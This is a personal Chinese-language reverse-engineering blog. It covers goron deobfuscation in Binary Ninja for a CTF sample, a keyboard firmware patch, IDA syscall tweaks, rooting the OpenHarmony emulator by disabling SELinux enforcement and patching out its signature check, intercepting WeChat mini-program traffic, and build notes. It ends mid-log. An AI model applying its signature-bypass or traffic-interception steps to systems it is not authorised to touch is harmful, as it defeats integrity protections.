s1nk != sink

玉灿吃屎日记 - 吃 goron 记

s1nk — Mon, 20 Apr 2026 16:00:00 GMT

前言

这个样本是上周日在“软件赛区域赛”中遇到的，当时使用 angr 拿过往针对 arm64 的反混淆脚本改了一下，勉强能看，事后觉得不够优雅，遂配合 AI 以开发 BinaryNinja 插件的方式，以一种更优雅的方式解决了这个混淆。

样本观察

以我对各种混淆的了解，这个题目的混淆应该使用的是 goron，使用了间接跳转、间接函数调用、间接全局变量引用、字符串（C string）加密、过程相关控制流平坦混淆，也算是“拉满了”，不过总归是个开源的，单从强度上来说在这个 AI 时代其实谈不上高，或许 AI 可以直接生吃，但是坚持反混淆也算是一种老一辈艺术家的坚守。

间接跳转

且先看一段调用的 BinaryNinja 的 LLIL SSA form 的调用地址计算逻辑

   5 @ 140001009  [rsp#3 + 0x41c {var_1c}].d = 0x2e0f1794 @ mem#2 -> mem#3
   6 @ 140001014  rax#1 = zx.q([rsp#3 + 0x41c {var_1c}].d @ mem#3)

  24 @ 140001079  [rsp#3 + 0x134 {var_304}].d = rax#1.eax @ mem#7 -> mem#8

  33 @ 1400010aa  cond:0#1 = temp0#1.d s< -0x231bebc0
  34 @ 1400010af  rcx#6 = zx.q(0xd)
  35 @ 1400010b4  rdx#6 = zx.q(0x2f)
  36 @ 1400010b9  if (cond:0#1) then 37 else 39 @ 0x1400010bc

  37 @ 1400010b9  rdx#7 = zx.q(rcx#6.ecx)
  38 @ 1400010b9  goto 39 @ 0x1400010bc

  39 @ 1400010bc  rdx#8 = ϕ(rdx#6, rdx#7)
  40 @ 1400010bc  r8#4 = [&data_140033c28].q @ mem#12
  41 @ 1400010c3  rcx#7 = zx.q(0xdc1facc8)
  42 @ 1400010c8  r9#5 = zx.q([rsp#3 + 0x134 {var_304}].d @ mem#12)
  43 @ 1400010d0  rcx#8 = zx.q(rcx#7.ecx - r9#5.r9d)
  44 @ 1400010d3  r10#2 = sx.q(rcx#8.ecx)
  45 @ 1400010d6  r8#5 = r8#4 + r10#2
  46 @ 1400010d9  r10#3 = zx.q(rdx#8.edx)
  47 @ 1400010dc  r8#6 = [r8#5 + (r10#3 << 3)].q @ mem#12
  48 @ 1400010e0  rcx#9 = zx.q(0xa92f1d1c)
  49 @ 1400010e5  rcx#10 = zx.q(rcx#9.ecx - r9#5.r9d)
  50 @ 1400010e8  r10#4 = sx.q(rcx#10.ecx)
  51 @ 1400010eb  r8#7 = r8#6 + r10#4
❓  52 @ 1400010ee  jump(r8#7)

=> r8#7 = [r8#5 + (r10#3 << 3)].q + (0xa92f1d1c - var_304)
        = [r8#5 + (ϕ(0xd, 0x2f) << 3)].q + (0xa92f1d1c - var_1c)

其中 r8#5 的计算逻辑我们先不展开，反正他就是个跳转表的基地址，所以这样看其实就很直观了，本质上就是 DestBBs[idx] + (X - MySecret) 对应的正是 llvm/lib/Transforms/Obfuscation/IndirectBranch.cpp 中的下面的内容

其中 var_1c 对应 MySecret

Value *MySecret;
if (SecretInfo) {
  MySecret = SecretInfo->SecretLI;
} else {
  MySecret = ConstantInt::get(Type::getInt32Ty(Ctx), 0, true);
}

if (BI && BI->isConditional()) {
  IRBuilder<> IRB(BI);

  Value *Cond = BI->getCondition();
  Value *Idx;
  Value *TIdx, *FIdx;

  TIdx = ConstantInt::get(Type::getInt32Ty(Ctx), BBNumbering[BI->getSuccessor(0)]);
  FIdx = ConstantInt::get(Type::getInt32Ty(Ctx), BBNumbering[BI->getSuccessor(1)]);
  Idx = IRB.CreateSelect(Cond, TIdx, FIdx);

  Value *GEP = IRB.CreateGEP(DestBBs, {Zero, Idx});
  LoadInst *EncDestAddr = IRB.CreateLoad(GEP, "EncDestAddr");
  // Use IPO context to compute the encryption key
  // X = FuncSecret - EncKey
  Constant *X;
  if (SecretInfo) {
    X = ConstantExpr::getSub(SecretInfo->SecretCI, EncKey);
  } else {
    X = ConstantExpr::getSub(Zero, EncKey);
  }
  // -EncKey = X - FuncSecret
  Value *DecKey = IRB.CreateSub(X, MySecret);
  Value *DestAddr = IRB.CreateGEP(EncDestAddr, DecKey);

  IndirectBrInst *IBI = IndirectBrInst::Create(DestAddr, 2);
  IBI->addDestination(BI->getSuccessor(0));
  IBI->addDestination(BI->getSuccessor(1));
  ReplaceInstWithInst(BI, IBI);
}

间接函数调用

先看一段调用的 BinaryNinja 的 LLIL SSA 形式的调用地址 r9#3 的计算逻辑


 5 @ 140001009  [rsp#3 + 0x41c {var_1c}].d = 0x2e0f1794 @ mem#2 -> mem#3
 6 @ 140001014  rax#1 = zx.q([rsp#3 + 0x41c {var_1c}].d @ mem#3)
10 @ 140001039  rcx#1 = [&data_140033c20].q @ mem#6
11 @ 140001040  rdx#1 = zx.q(0xdc1facc8)
12 @ 140001045  r8#1 = zx.q(rdx#1.edx)
13 @ 140001048  r8#2 = zx.q(r8#1.r8d - rax#1.eax)
14 @ 14000104b  r9#1 = sx.q(r8#2.r8d)
15 @ 14000104e  rcx#2 = [rcx#1 + r9#1].q @ mem#6
16 @ 140001052  rdx#2 = zx.q(rdx#1.edx - rax#1.eax)
17 @ 140001054  r9#2 = sx.q(rdx#2.edx)
18 @ 140001057  rcx#3 = rcx#2 + r9#2
20 @ 14000105f  [rsp#3 + 0x138 {var_300}].q = rcx#3 @ mem#6 -> mem#7
23 @ 140001071  r9#3 = [rsp#3 + 0x138 {var_300}].q @ mem#7

=> r9#3 = rcx#2 + (0xdc1facc8 - var_1c)

其中 r8#5 的计算逻辑我们先不展开，它就是 EncDestAddr，在 llvm/lib/Transforms/Obfuscation/IndirectCall.cpp 中的生成逻辑如下，

Value *Idx = ConstantInt::get(Type::getInt32Ty(Ctx), CalleeNumbering[CS.getCalledFunction()]);
Value *GEP = IRB.CreateGEP(Targets, {Zero, Idx});
LoadInst *EncDestAddr = IRB.CreateLoad(GEP, CI->getName());

因为 Idx 是个绝对的常量，所以编译器优化会直接把 &Targets[Idx] 的地址整个计算出来 Load，把 EncDestAddr 当成一个全局变量，这里看不到 Targets[Idx] 的逻辑。

不难发现，上面的 rcx#2 + (0xdc1facc8 - var_1c) 刚好对应 EncDestAddr + (X - MySecret)


Value *Secret = IRB.CreateSub(X, MySecret);
Value *DestAddr = IRB.CreateGEP(EncDestAddr, Secret);

Value *FnPtr = IRB.CreateBitCast(DestAddr, FTy->getPointerTo());
FnPtr->setName("Call_" + Callee->getName());
CallInst *NewCall = IRB.CreateCall(FTy, FnPtr, Args, Call->getName());

间接全局变量引用

前文中省去了 DestBBs 和 EncDestAddr 的展开，现在回到这个问题，

   5 @ 140001009  [rsp#3 + 0x41c {var_1c}].d = 0x2e0f1794 @ mem#2 -> mem#3
   6 @ 140001014  rax#1 = zx.q([rsp#3 + 0x41c {var_1c}].d @ mem#3)

  24 @ 140001079  [rsp#3 + 0x134 {var_304}].d = rax#1.eax @ mem#7 -> mem#8
  40 @ 1400010bc  r8#4 = [&data_140033c28].q @ mem#12
  41 @ 1400010c3  rcx#7 = zx.q(0xdc1facc8)
  42 @ 1400010c8  r9#5 = zx.q([rsp#3 + 0x134 {var_304}].d @ mem#12)
  43 @ 1400010d0  rcx#8 = zx.q(rcx#7.ecx - r9#5.r9d)
  44 @ 1400010d3  r10#2 = sx.q(rcx#8.ecx)
  45 @ 1400010d6  r8#5 = r8#4 + r10#2

=> DestBBs = r8#5 = [&data_140033c28].q + (0xdc1facc8 - var_304)
           = [&data_140033c28].q + (0xdc1facc8 - var_1c)

   5 @ 140001009  [rsp#3 + 0x41c {var_1c}].d = 0x2e0f1794 @ mem#2 -> mem#3
   6 @ 140001014  rax#1 = zx.q([rsp#3 + 0x41c {var_1c}].d @ mem#3)

  10 @ 140001039  rcx#1 = [&data_140033c20].q @ mem#6
  11 @ 140001040  rdx#1 = zx.q(0xdc1facc8)
  12 @ 140001045  r8#1 = zx.q(rdx#1.edx)
  13 @ 140001048  r8#2 = zx.q(r8#1.r8d - rax#1.eax)
  14 @ 14000104b  r9#1 = sx.q(r8#2.r8d)
  15 @ 14000104e  rcx#2 = [rcx#1 + r9#1].q @ mem#6

=> EncDestAddr = rcx#2 = [[&data_140033c20].q + (0xdc1facc8 - var_1c)]

都刚好对应 EncGVAddr + (X - MySecret)

if (GlobalVariable *GV = dyn_cast(*op)) {
  if (GVNumbering.count(GV) == 0) {
    continue;
  }

  IRBuilder<> IRB(Inst);
  Value *Idx = ConstantInt::get(Type::getInt32Ty(Ctx), GVNumbering[GV]);
  Value *GEP = IRB.CreateGEP(GVars, {Zero, Idx});
  LoadInst *EncGVAddr = IRB.CreateLoad(GEP, GV->getName());
  Constant *X;
  if (SecretInfo) {
    X = ConstantExpr::getSub(SecretInfo->SecretCI, EncKey);
  } else {
    X = ConstantExpr::getSub(Zero, EncKey);
  }

  Value *Secret = IRB.CreateSub(X, MySecret);
  Value *GVAddr = IRB.CreateGEP(EncGVAddr, Secret);
  GVAddr = IRB.CreateBitCast(GVAddr, GV->getType());
  GVAddr->setName("IndGV");
  Inst->replaceUsesOfWith(GV, GVAddr);
}

过程相关特性

经过前面几处的分析，不难发现几乎 goron 中的每一种混淆都离不开 MySecret 这个值，对于上面分析的 main 函数这种可能被外界（非用户编写代码）的函数，MySecret 的值是定义在函数内部的，对于一定由用户定义代码调用的函数 MySecret 通过函数的第一个参数传递。比如样本中的 sub_140005c70，其 MySecret 从 [rcx#0].d 处初始化（也就是函数的第一个参数）。

   9 @ 140005c7b  rax#1 = zx.q([rcx#0].d @ mem#4)
  10 @ 140005c7d  [rsp#5 + 0x120 {var_28}].d = rax#1.eax @ mem#4 -> mem#5

  26 @ 140005ce2  [rsp#5 + 0xe8 {var_60}].d = rax#1.eax @ mem#10 -> mem#11

  69 @ 140005db7  cond:0#1 = temp0#1.d s< -0x4a34b609
  70 @ 140005dbc  rcx#6 = zx.q(0x11)
  71 @ 140005dc1  rdx#10 = zx.q(2)
  72 @ 140005dc6  if (cond:0#1) then 73 else 75 @ 0x140005dc9

  73 @ 140005dc6  rdx#11 = zx.q(rcx#6.ecx)
  74 @ 140005dc6  goto 75 @ 0x140005dc9

  75 @ 140005dc9  rdx#12 = ϕ(rdx#10, rdx#11)
  76 @ 140005dc9  r8#10 = [&data_140033da8].q @ mem#21
  77 @ 140005dd0  rcx#7 = zx.q(0x6c7f5c1c)
  78 @ 140005dd5  r9#6 = zx.q([rsp#5 + 0xe8 {var_60}].d @ mem#21)
  79 @ 140005ddd  rcx#8 = zx.q(rcx#7.ecx - r9#6.r9d)
  80 @ 140005de0  r10#7 = sx.q(rcx#8.ecx)
  81 @ 140005de3  r8#11 = r8#10 + r10#7
  82 @ 140005de6  r10#8 = zx.q(rdx#12.edx)
  83 @ 140005de9  r8#12 = [r8#11 + (r10#8 << 3)].q @ mem#21
  84 @ 140005ded  rcx#9 = zx.q(0xdff33be4)
  85 @ 140005df2  rcx#10 = zx.q(rcx#9.ecx - r9#6.r9d)
  86 @ 140005df5  r10#9 = sx.q(rcx#10.ecx)
  87 @ 140005df8  r8#13 = r8#12 + r10#9
❓  88 @ 140005dfb  jump(r8#13)

BinaryNinja 反混淆思路

BinaryNinja 提供了 Workflow API 可以在反编译流程中修改 IL 代码。修改 IL 代码，不像 patch 汇编需要考虑空间够不够，状态寄存器有没有被覆盖...这些鸡零狗碎，复杂至极的问题迎刃而解。

后文中提到的 functionKey，对应的就是前面分析 goron 源码时出现的 MySecret。

“过程相关” 对抗

这个样本最麻烦的地方，不是某一种单独的混淆，而是几乎所有混淆都和过程内的 functionKey 绑定在一起。间接跳转依赖它，间接函数调用依赖它，间接全局变量引用依赖它，控制流平坦化里的状态初始化也依赖它。只要这个值还是脏的，后面所有地址相关表达式都会跟着脏掉。

首先对当前样本来说，哪些函数需要 functionKey、functionKey 是什么，分析者是很容易知道的，先把这个输入显式提供出来。对于这个问题，我的做法是通过 metadata.eat_shit.functionKey 为函数提供对应的 functionKey 值，再单独加一个 func_key_pass，在 LLIL SSA 层先把函数入口对 functionKey 的读取改成常量。这样后续无论是前端分析里的栈初始化收集、间接跳转恢复，还是 workflow 中的常量折叠与控制流恢复，处理的都是已经被修正过的 IL。

间接跳转恢复

间接跳转恢复是一切的基础。当前样本里很多真实代码块都挂在间接跳转后面，BinaryNinja 如果不知道跳转目标，连 CFG 都搭不出来，函数边界也会跟着乱掉。在这种状态下，别说在 Workflow 里 patch IL，大部分基本块 BinaryNinja 压根都不认为它们是代码。

所以第一步不是急着 patch jump(reg)，而是先算出它的两个真实目标，然后调用 set_user_indirect_branches 把用户分支信息喂给 BinaryNinja，先把 CFG 恢复出来。只有 CFG 先恢复出来，BinaryNinja 才能把这些目标块重新纳入函数，Workflow 里的 pass 也才能继续在正确的函数范围上工作。

目标求解本身还是基于 LLIL SSA 反向切片。最终落点表现为 jump(reg)，在 SSA 里顺着 reg 的定义链往回追，就可以还原出目标地址的计算表达式。于是问题就变成了：给定分支条件取真和取假两种环境，最终的跳转表达式各自会算出什么地址。

做法比较直接：

从当前 jump(reg) 出发，做一份反向切片。
在切片中定位真正控制分支的 SSA 定义。
分别模拟分支取真、取假时的环境。
计算出 T0 和 T1 两个目标地址。
先调用 set_user_indirect_branches 恢复 CFG。
再在 Workflow 里把这个间接跳转 patch 成 if goto。

这样拆成两步之后，事情就顺了。前一步解决“让 BN 知道这些边存在”，后一步解决“把 IL 改成更好分析的形式”。对当前样本，main 里恢复了数十个间接跳转，sub_140005c70 里也恢复了十几个；做到这一步后，函数图才真正从“断掉的碎块集合”变成一个还能继续反编译的函数。

间接全局变量引用、间接函数调用恢复

间接全局变量引用和间接函数调用，本质上都是同一类问题：原来应该直接出现的地址，被改写成了 EncAddr + (X - MySecret) 这种依赖过程内 key 的表达式。只要 key 已经在前面的 func_key_pass 里被常量化，这一类表达式后面就都可以交给常量传播去吃。

这里注意到，无论是间接全局变量引用还是间接函数调用，最终如果做“强力的常量折叠”（不考虑 data 段可写），得到的常量一定是一个指针，指向当前程序的某个段。所以，这里并没有针对它们的规则做匹配简化，而是统一交给 constant_fold_pass 在 LLIL SSA 层递归求值，把所有能稳定折叠成 section pointer 的表达式直接替换成 CONST_PTR。一旦替换成功，BinaryNinja 自己就会把它重新识别成更正常的调用目标、全局变量引用或跳转表地址。

这样做的关键前提有两个：

functionKey 已经先被 patch 成常量。
已经把完整的函数边界恢复出来。

控制流平坦化恢复

这一部分整体思路部分参考了葫芦娃前辈的文章深入 OBPO 还原控制流的核心原理

前面的几个 pass 做完之后，剩下最难看的部分就是控制流平坦化。这里我没有走“从入口一路模拟到函数结束”的路线，而是先把问题拆成三个更具体的问题：

哪些块属于 dispatcher？
每个 state 对应的 case head 是哪个块？
每个 case 最终会把状态改成什么，然后跳回哪个 dispatcher？

dispatcher 识别

当前实现里，dispatcher 的识别标准很克制：

块尾是 MLIL_IF
条件表达式最终可以规约成“状态变量的无副作用派生值”和“常量”的比较

这里“无副作用派生值”只支持一小组非常保守的表达式：

VAR
ZX / SX / LOW_PART
一层 PHI
ADD / SUB / XOR 常量

目的不是做一个完整解释器，而是只接受当前样本里足够稳定的状态表达式，让状态传播仍然是可解释、可验证的。

状态到 case 的映射

做法上，先从入口走到第一个 dispatcher，执行 prologue，把初始状态算出来；再沿 dispatcher 的条件判断传播 state 集合，把“某个具体 state 会落到哪个 case head”恢复出来。

case 后继恢复

case 出口恢复是从 case head 出发递归遍历后继块；某条路径一旦进入其他 case 的入口块，就认为它已经离开当前 case，不再继续；如果路径重新回到 dispatcher，就把这条路径上最近一次状态写回对应的值记成这个 case 的 successor。

这样就可以把：

入口 goto dispatcher
case 内部的“写状态然后回 dispatcher”
分支 case 的“分别写两个状态再回 dispatcher”

统一改写成 case 到 case 的直接边。BinaryNinja 重新生成 MLIL / HLIL 后，原本那层 dispatcher 就会被撕掉，控制流重新回到正常可读的结构上。

结果与总结

最终反混淆效果如下，剩下字符串加密没有处理，终归是一个 CTF 题，这种程度的字符串加密大家肯定都是一脚踢死就没必要再专门写一下了。

~~代码基本都是 AI 编写的，就不掏出来献丑了~~ 应群友要求现开放源代码 https://github.com/GaoYuCan/eat_shit

面向 x86_64 架构下的 goron 混淆框架设计，属于纯 vibecoding 的实验性代码，仅用于研究和学习。

MCHOSE G75 Pro 强行改键

s1nk — Fri, 02 Jan 2026 16:00:00 GMT

前言

手里有把 MCHOSE G75 Pro 键盘，功能、声音什么的都挺好，就一个非常脑瘫的问题，MacOS 下要按出来 F1-F12 必须得 Fn + F? , 还不支持反转，这不是糖吗？凭什么 MacOS 用户按 F1-F12 就得按两下，Windows 就只用按一下，问客服也说只能这样。

我就这样用了大概有一年，直到昨天晚上，我突发觉得我必须解决这个问题，我要改掉它，于是就有了下面的内容。

提取固件

为了提取固件，我费了很大力气把键盘壳撬开里面主控应该是 BYK916 ，搜索了一下总结下来这个芯片用的是 8051 指令集，而且大概率是 Sinowealth SH68F90A 这款芯片的换皮。

然后，我继续搜怎么提取固件，就搜到了 sinowealth-kb-tool 这个工具，可以直接通过 USB 对固件进行读取、刷写。

根本不用拆开键盘，更不用把自己的三模切换开关撬碎 😭😭

https://github.com/carlossless/sinowealth-kb-tool

看一下 vendor_id 和 product_id

sinowealth-kb-tool read --platform sh68f90 --vendor_id 0x258a --product_id 0x010C firmware.hex

固件分析、Patch

参考当年分析 iMK 键盘思路，尝试直接硬搜按键映射矩阵，

最终搜索 00 00 00 29 00 00 00 35 （0x29 代表 esc）、（0x35 代表 ~/`）找到了 4 组

然后发现 0xb400 和 0xcc00 内容完全一样，对照键位都是 windows 的键位，而 0xb600 和 0xce00 内容完全一样，对照键位都是 macos 的键位。

def read_keyboard_map(base):
    keyboard_map = []
    for i in range(16): # 后面发现 20 列，但是多的没用到，因为我这是一把 75 配列的
        col = []
        for j in range(6): # 6 行
            col.append(idaapi.get_dword(base + (i * 6 + j) * 4))
        keyboard_map.append(col)
    return keyboard_map

后面分析了很久的代码，以为会像 iMK 那个一样会有针对 fn 层的专门的处理，决定 fn + ? 输出什么，但我在 int0 的按键扫描处理逻辑中并没有发现这样的东西（虽然我也没完全看明白，但是我就看到它一直在查表）我就想是不是还会有别的表呢。

我就又用 read_keyboard_map 往后读了 0xb800 的，发现还真是 windows 的 fn 层的映射矩阵。于是我得到了

地址	长度	含义
0xb400/0xcc00	0x200	windows layer 0
0xb600/0xce00	0x200	macos layer 0
0xb800/0xd000	0x200	windows layer fn
0xba00/0xd200	0x200	macos layer fn

那还扯啥呢？

"""
MacOS 模式键位映射地址
layer0 0xb600、0xce00
layer1 0xba00、0xd200

f1 - f12 layer0 和 layer1 互换

"""

from intelhex import IntelHex
import struct

def get_dword(ih: IntelHex, addr: int) -> int:
    b0 = ih[addr]
    b1 = ih[addr + 1]
    b2 = ih[addr + 2]
    b3 = ih[addr + 3]
    return struct.unpack(">I", bytes([b0, b1, b2, b3]))[0]

def patch_dword(ih: IntelHex, addr: int, value: int) -> None:
    b = struct.pack(">I", value)
    ih[addr] = b[0]
    ih[addr + 1] = b[1]
    ih[addr + 2] = b[2]
    ih[addr + 3] = b[3]

def impl(ih: IntelHex, layer0: int, layer1: int) -> None:
    """交换 layer0 和 layer1 中 F1-F12 键的映射"""
    for i in range(12):
        addr0 = layer0 + (i + 1) * 6 * 4
        addr1 = layer1 + (i + 1) * 6 * 4
        v0 = get_dword(ih, addr0)
        v1 = get_dword(ih, addr1)
        print(f"f{i + 1}: {v0:08x} <-> {v1:08x}")
        patch_dword(ih, addr0, v1)
        patch_dword(ih, addr1, v0)

def main():
    input_file = "firmware.hex"
    output_file = "firmware_patched.hex"

    ih = IntelHex(input_file)

    impl(ih, 0xb600, 0xba00)
    impl(ih, 0xce00, 0xd200)

    ih.write_hex_file(output_file)

if __name__ == "__main__":
    main()

然后写回去即可

sinowealth-kb-tool write --platform sh68f90 --vendor_id 0x258a --product_id 0x010C firmware_patched.hex

IDA Pro Linux系统调用识别优化

s1nk — Sun, 28 Dec 2025 16:00:00 GMT

What

对于已知的系统调用(比如 prctl)IDA Pro的识别效果如下，系统调用被优化成了函数调用的形式，而且返回值和参数都被纳入了后续的分析、优化之中。

而对于未知的系统调用（比如 clone3）则被以外部指令 _asm { syscall } 的形式实现，看起来很难受，更重要的是这样会导致 IDA 再后续的分析中认为 eax 的值被赋值为常量 0x1b3，而不是 clone3 系统调用的返回值，进而导致后续反编译器在死代码移除阶段移除对应的子进程逻辑，造成反编译代码语义上的错误、不完整。

How

既然反编译器反编译出来了 sys_prctl 这个名字，那么安装目录下一定会有这个字符串，或者相关字符串，直接 grep 开搜

发现目标字符串只出现在 loadint 的代码及其编译产物中，尝试修改 linux64.cmt

关闭IDA Pro后，使用如下指令重新生成 ida.int

./tools/loadint/loadint -n=ida.hlp tools/loadint/comment.cmt ida.int

重新加载文件，反编译效果如下

Root DevEco-Studio OpenHarmonyOS Emulator on macOS

s1nk — Sun, 24 Aug 2025 16:00:00 GMT

修改 system.img

本节内容参考自：https://wuxianlin.com/2024/10/27/root-harmonyos-next-emultor/

挂载 system.img
sudo mount -o rw,loop system.img ~/system_oho
修改 system/etc/param/ohos.para
const.secure=1 -> const.secure=0
const.debuggable=0 -> const.debuggable=1
修改 system/etc/param/hdc.para
参考非root版本文件内容和 root版本文件内容修改即可
修改 system/etc/init/hdcd.cfg
参考非root版本文件内容和 root版本文件内容修改即可，其中 hdcd 的 selinux 上下文设置为 u:r:hdcd:s0 ，也就是不改。
修改 system/etc/selinux/system_common.cil
(type sh) -> (typepermissive sh)
取消挂载

Patch emulator

按照上面的方法对 system.img 进行 patch 后，发现镜像文件检验失败无法启动镜像（我镜像你也要校验，真下头

对 Emulator 文件进行逆向后发现，校验的实现在 CheckImage::CheckSign 函数

patch 也比较简单 VerifyReleaseCmsFile 函数修改为 return 0 即可。然后重新签名一下

sudo codesign -s - --entitlements app.entitlements --force  Emulator_patched

其中 app.entitlements 的内容为

"1.0" encoding="UTF-8"?>
plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<dict>
    <key>com.apple.security.hypervisorkey>
    <true/>
dict>
plist>

签名部分参考自：https://stackoverflow.com/questions/64642062/apple-hypervisor-is-completely-broken-on-macos-big-sur-beta-11-0-1

Surge + BurpSuite 微信小程序抓包实践

s1nk — Wed, 20 Aug 2025 16:00:00 GMT

Why

对于在 Mac 上如何对微信小程序进行抓包这个问题，网上的解决方法以及非常成熟了。 Proxifier + 任意一个 Http(s) 抓包工具，然后在 Proxifier 中修改配置让 WeChatAppEx Helper 这个进程走代理即可。这么做可以，而且一直以来我也是这么做的。但是不优雅，对 Surge 用户来说不优雅，我使用 Surge 作为科学上网工具，但是Proxifier 和 Surge 在我使用中是有些冲突的，每次我要打开 Proxifier 我就不得不进入设置打开它的网络拓展，然后关闭（甚至彻底移除） Surge 的网络拓展。在折腾半天抓完包之后再这样反过来做一遍。这很麻烦，也很没必要，因为 Surge 本身就完全具备 Proxifier 的这一功能，但是我搜索全网好像并没有找到相关的资料。

How

在 Surge 的策略界面，添加一个新的代理，⚠️注意⚠️协议选择 HTTP，其他没啥可注意。另外测试会失败我也不知道为什么，但是无所谓，

我测试好像只有选择 HTTP 它才 work

然后添加一下规则，Surge 可以按照 Process-Name 设置代理，当然也有更方便的 GUI 可以设置（请求查看器里）

纵享丝滑

记一次 capstone BUG 处理

s1nk — Sun, 23 Mar 2025 16:00:00 GMT

最近在使用 angr 搞一些东西，在 angr 所依赖的 capstone 5.x 版本(图中使用的是截止本文发表时 capstone 的 5.x 版本的最新版 5.0.6) 中发现了一个 capstone 的问题。

问题如下图所示

显然，这条指令读取的是 W27 和 W8，写的是 NZCV (标志寄存器)，但是 regs_access 的返回是读了 W8 写了 W27 和 NZCV。

Registers read: w8
Registers modified: nzcv w27

查找相关 issues 发现了一个 2020 的 issues

https://github.com/capstone-engine/capstone/issues/1653

并且在 2021 已经合并了

https://github.com/capstone-engine/capstone/pull/1655

就在我摸不到头脑的时候，突然注意到

next 是 6.x 的分支，也就是说这个bug确实修了但是 5.x 没修。

看了一下 commit ，改动也很简单。

在 printOperand 函数里对着改一下即可，然后编译一个动态链接库替换进去。

cmake -B build -DCMAKE_BUILD_TYPE=Release -DBUILD_SHARED_LIBS=ON
cmake --build build
cp libcapstone.dylib  /Users/gaoyucan/.pyenv/versions/3.10.15/lib/python3.10/site-packages/capstone/lib/

记一次离谱的AOSP编译经历

s1nk — Sat, 08 Mar 2025 16:00:00 GMT

最近突发奇想，想给很多年前买的 Pixel 一代（sailfish）编译一个 AOSP 的系统。因为之前虽然经常编译 LineageOS，但是仔细一想还真没有给真机器编译过 AOSP 的系统。

准备阶段

查阅Google官网的文档发现 Pixel 一代所支持的最新版本是 android-10.0.0_r17，build ID 是 QP1A.191005.007.A3。这里我选择从 USTC 镜像源拉源代码，虽然我在北京，但是清华源基本处于一个不可用的状态，不知道是因为北邮校园网的问题还是啥。一如我当年在安徽大学（中科大对门）用过清华源的 pypi 镜像。

export REPO_URL=https://gerrit-googlesource.proxy.ustclug.org/git-repo

repo init -u git://mirrors.ustc.edu.cn/aosp/platform/manifest -b android-10.0.0_r17

repo sync # 加 -c 可能会更快，但是我懒得加了，因为一晚上肯定拉完了

下载好之后，要添加一下驱动，在这 https://developers.google.com/android/drivers按build ID搜索一下，下载对应机型的，解压出来./extract-qcom-sailfish.sh和./extract-google_devices-sailfish.sh 在源代码目录下执行一下即可。

至此，就准备好了。

编译

😭 Ubuntu 22.04

我用的是 Ubuntu 22.04，我看符合官网上 Ubuntu 18.04 or later 的要求我就直接开编译了，直接就是三板斧。

source build/envsetup.sh

lunch aosp_sailfish-userdebug

make -j$(nproc)

然后就给报了错，

******************************
You have tried to change the API from what has been previously approved.

To make these errors go away, you have two choices:
   1. You can add '@hide' javadoc comments to the methods, etc. listed in the
      errors above.

   2. You can update current.txt by executing the following command:
         make test-api-stubs-docs-update-current-api

      To submit the revised current.txt to the main Android repository,
      you will need approval.
******************************

14:26:06 ninja failed with: exit status 1

或者

FAILED: out/soong/.intermediates/frameworks/base/api-stubs-docs/android_common/check_last_released_api.timestamp
( rm -rf "out/soong/.intermediates/frameworks/base/api-stubs-docs/android_common/last-apicheck/srcjars" && mkdir -p "out/soong/.intermediates/frameworks/base/api-stubs-docs/android_common/last-apicheck/srcjars" && out/soong/host/linux-x86/bin/zipsync -d out/soong/.intermediates/frameworks/base/api-stubs-docs/android_common/last-apicheck/srcjars -l out/soong/.intermediates/frameworks/base/api-stubs-docs/android_common/last-apicheck/srcjars/list -f "*.java" out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/privacy.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/section.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/activitymanager.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/alarmmanager.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/notification.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/notification_channel.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/notification_channel_group.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/notificationmanager.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/pendingintent.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/profilerinfo.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/settings_enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/statusbarmanager.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/window_configuration.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/app/job/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/bluetooth/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/bluetooth/a2dp/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/bluetooth/hci/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/bluetooth/hfp/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/bluetooth/smp/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/content/activityinfo.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/content/clipdata.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/content/clipdescription.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/content/component_name.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/content/configuration.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/content/featureinfo.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/content/intent.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/content/locale.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/content/package_item_info.srcjar 